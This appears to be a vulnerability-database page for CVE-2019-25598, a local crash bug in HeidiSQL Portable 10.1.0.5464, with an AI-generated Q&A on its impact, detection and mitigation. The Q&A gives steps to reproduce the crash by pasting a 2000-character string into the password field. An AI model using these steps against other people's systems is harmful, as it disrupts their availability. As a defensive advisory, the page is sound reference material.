CVE-2019-25598
Buffer Overflow in HeidiSQL 10.1.0 Causes Local DoS
Publication date: 2026-03-22
Last updated on: 2026-03-22
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| heidisql | heidisql_portable | 10.1.0.5464 |
| heidisql | heidisql_portable | to 10.1.0.5464 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-787 | The product writes data past the end, or before the beginning, of the intended buffer. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2019-25598 is a denial of service vulnerability in HeidiSQL Portable version 10.1.0.5464. It occurs when a local attacker inputs an excessively long string into the password field during a Microsoft SQL Server login attempt. This triggers a buffer overflow condition that causes the application to crash.
The vulnerability is classified under CWE-787 (Out-of-bounds Write) and does not require any privileges or user interaction to exploit. The attack vector is local, and the impact is a high availability loss due to the application crash.
How can this vulnerability impact me? :
This vulnerability can cause HeidiSQL Portable to crash when an attacker supplies an excessively long password string during login. This results in a denial of service condition, making the application unavailable for legitimate users.
- Loss of availability of the HeidiSQL application.
- Potential disruption of database management tasks relying on HeidiSQL.
- No direct impact on confidentiality or integrity, but service interruption could affect operations.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
[{'type': 'paragraph', 'content': 'This vulnerability can be detected by attempting to reproduce the denial of service condition using the known exploit method. Specifically, a local test involves supplying an excessively long string in the password field during a Microsoft SQL Server login in HeidiSQL Portable 10.1.0.5464.'}, {'type': 'list_item', 'content': "Run the provided Python script `HeidiSQL_Portable_10.1.0.5464.py` to generate a payload file containing 2000 'A' characters."}, {'type': 'list_item', 'content': 'Copy the contents of the generated file `bd_p.txt` to the clipboard.'}, {'type': 'list_item', 'content': "Launch HeidiSQL Portable and create a new connection with network type set to 'Microsoft SQL Server (TCP/IP)'."}, {'type': 'list_item', 'content': "Enable 'Prompt for credentials' and open the connection."}, {'type': 'list_item', 'content': "In the login dialog, set authentication method to 'Password' and paste the clipboard content (the long string) into the password field."}, {'type': 'list_item', 'content': "Click 'Login' and observe if the application crashes, indicating the presence of the vulnerability."}] [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include avoiding the use of HeidiSQL Portable version 10.1.0.5464 or earlier until a patched version is available.
Do not allow untrusted local users to access the system or run HeidiSQL Portable, as the vulnerability requires local access.
Monitor for updates or patches from the HeidiSQL developers and apply them as soon as they are released.
As a temporary workaround, avoid pasting or entering excessively long strings in the password field during Microsoft SQL Server login attempts.